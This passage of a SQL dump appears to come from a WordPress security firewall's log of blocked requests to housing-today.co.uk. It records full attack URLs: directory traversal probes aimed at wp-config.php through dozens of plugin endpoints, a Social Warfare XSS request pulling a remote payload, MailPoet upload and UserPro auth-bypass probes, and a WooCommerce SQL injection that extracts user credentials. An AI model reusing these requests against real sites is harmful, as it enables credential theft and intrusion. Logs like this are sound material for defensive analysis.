wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2372,1630545715.504675,1630545715.424900,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=%2F&item=..%2Fwp-config.php&order=name&srt=yes',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpdGVtXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2373,1630545715.262324,1630545715.158100,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/edit.php?page=wp-db-backup.php&backup=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tiYWNrdXBd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2VkaXQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2374,1630545714.988823,1630545714.896400,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/themes/authentic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2F1dGhlbnRpYy9pbmNsdWRlcy9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2375,1630545714.733518,1630545714.655300,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2376,1630545714.492900,1630545714.413900,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWNoYXQtYnJvYWRjYXN0L3dlY2hhdC9JbWFnZS5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2377,1630548310.166075,1630548310.051000,'\0\0\0\0\0\0\0\0\0\0��%\0�',0,403,0,0,0,'https://housing-today.co.uk/1index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzFpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(2378,1630548293.722357,1630548293.635400,'\0\0\0\0\0\0\0\0\0\0��%\0�',0,403,0,0,0,'https://housing-today.co.uk/1index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzFpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(2379,1630575397.020043,1630575396.932100,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2380,1630575395.665672,1630575395.487100,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2381,1630575410.131377,1630575410.034500,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2382,1630575404.138692,1630575404.050900,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2383,1630575400.766546,1630575400.681900,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2384,1630575424.735124,1630575424.645700,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2385,1630575445.877721,1630575445.796000,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2386,1630575441.397532,1630575441.314300,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2387,1630575438.569636,1630575438.489200,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2388,1630575436.936295,1630575436.850700,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2389,1630575435.247965,1630575435.163600,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2390,1630575433.014521,1630575432.932700,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL05hdGl2ZUNodXJjaC9kb3dubG9hZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2391,1630575431.352261,1630575431.264800,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2392,1630575429.789430,1630575429.694800,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2393,1630575449.906594,1630575449.814400,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=...%2F.%2F...%2F.%2F...%2F.%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkb3dubG9hZF9maWxlXQ==\",\"paramValue\":\"Li4uLy4vLi4uLy4vLi4uLy4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLXNpbXBsaWZpZWQtZm9yLW9hcC1tZW1iZXJzLW9ubHkvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2394,0.000000,1630619431.500841,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://housing-today.co.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(2395,1631012062.712098,1631012062.477700,'\0\0\0\0\0\0\0\0\0\0��-�Sq',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(2396,1631012078.125764,1631012078.034700,'\0\0\0\0\0\0\0\0\0\0��-�Sq',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(2397,1631012084.116494,1631012084.027200,'\0\0\0\0\0\0\0\0\0\0��-�Sq',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2398,1631012097.082554,1631012097.003000,'\0\0\0\0\0\0\0\0\0\0��-�Sq',0,403,0,0,0,'https://housing-today.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(2399,1631012196.790175,1631012196.707700,'\0\0\0\0\0\0\0\0\0\0��-�Sq',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2400,1631012195.548925,1631012195.469300,'\0\0\0\0\0\0\0\0\0\0��-�Sq',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2401,1631359632.961692,1631359632.741700,'\0\0\0\0\0\0\0\0\0\0��^x�k',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(2402,1631359663.397210,1631359663.301100,'\0\0\0\0\0\0\0\0\0\0��^x�k',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(2403,1631359729.156489,1631359729.042800,'\0\0\0\0\0\0\0\0\0\0��^x�k',0,403,0,0,0,'https://housing-today.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(2404,1631359851.979377,1631359851.840300,'\0\0\0\0\0\0\0\0\0\0��^x�k',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2405,1631388953.968930,1631388953.876700,'\0\0\0\0\0\0\0\0\0\0��SB�A',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(2406,1631388971.215100,1631388971.120900,'\0\0\0\0\0\0\0\0\0\0��SB�A',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2407,1631389172.569975,1631389172.479200,'\0\0\0\0\0\0\0\0\0\0��SB�A',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2408,0.000000,1631397183.974887,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://housing-today.co.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(2409,1631507051.982304,1631507051.886700,'\0\0\0\0\0\0\0\0\0\0���JL�',0,403,0,0,0,'https://housing-today.co.uk/wp-json/wc/store/products/collection-data?calculate_attribute_counts%5B0%5D%5Btaxonomy%5D=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252Cuser_login%25252C0x3a%25252Cuser_email%25252C0x3a%25252Cuser_pass%252529from%252520wp_users%252520%25253B%252500',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','blocked:waf','WooCommerce < 5.5.1 SQL 